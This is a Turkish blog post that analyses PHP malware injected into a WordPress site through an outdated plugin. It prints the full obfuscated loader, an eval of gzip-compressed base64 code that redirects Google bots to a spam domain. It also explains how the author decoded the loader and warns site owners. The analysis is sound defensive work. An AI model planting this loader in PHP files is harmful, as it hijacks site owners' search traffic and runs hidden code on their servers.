Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

Zararlı PHP kodu (PHP Malware)

Eski bir wordpress plug’in nin neden olduğu sızmada aşağıdaki kod php betiklerinin başına eklenmiş.

  $oO0="cr"."eat"."e_fun"."cti"."on";[email protected]$oO0('$x','ev'.'al'.'("?>".gz'.'inf'.'late'.'( bas'.'e64'.'_de'.'co'.'de($x)));');@$o0O("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA==");

Koda baktığımızda Eval işlemini yapan fonksiyonun okunmasını zorlaştırmak için parçalandığı göze çarpıyor. eval fonksiyonu ise gz (Gnome Zip) ve ardından base64 ile kodlanmış PHP kodunu execute ediyor. Zararlı Kodu görmek içip eval’i iptal ederek kodu çalıştırdım:

echo gzinflate(base64_decode("s7EvyCjg5cpM0yguKSrIL9ZQiQ92DQpzDYpW9wgJCYgPBfLiHd1d/ULUY3WU8vPTc1KT8kuUNDWrebk4M1ITU1KLNJRAKvUN9QwVjA0MFXzzy1JTFAJSi3IT81LzSnIqlTStkdT65CcnlmTm51kpZJSUFBRb6euXl5frpSUmp+YmFmcb5+ZZmuol5+cCNaVkpgI11vJy2dsBAA=="));

Kodu çıktısı aşağıdaki gibi:


Görünüşe göre, zararlı arkadaş google bot’larını www.facemask3mn95.com adresine yönlendirmekte. Bu yönlendirmeyi ise “site kalıcı olarak şu adrese taşındı” manasına gelen HTTP 301 kodu ile yapması. Web ziyaretçi sayısında anormal düşüşler görürseniz bu tarz bir saldırıya maruz kalmış olabilirsiniz. Dikkatli olun.



This post first appeared on Tankado.com, please read the originial post: here

Share the post

Zararlı PHP kodu (PHP Malware)

×

Subscribe to Tankado.com

Get updates delivered right to your inbox!

Thank you for your subscription

×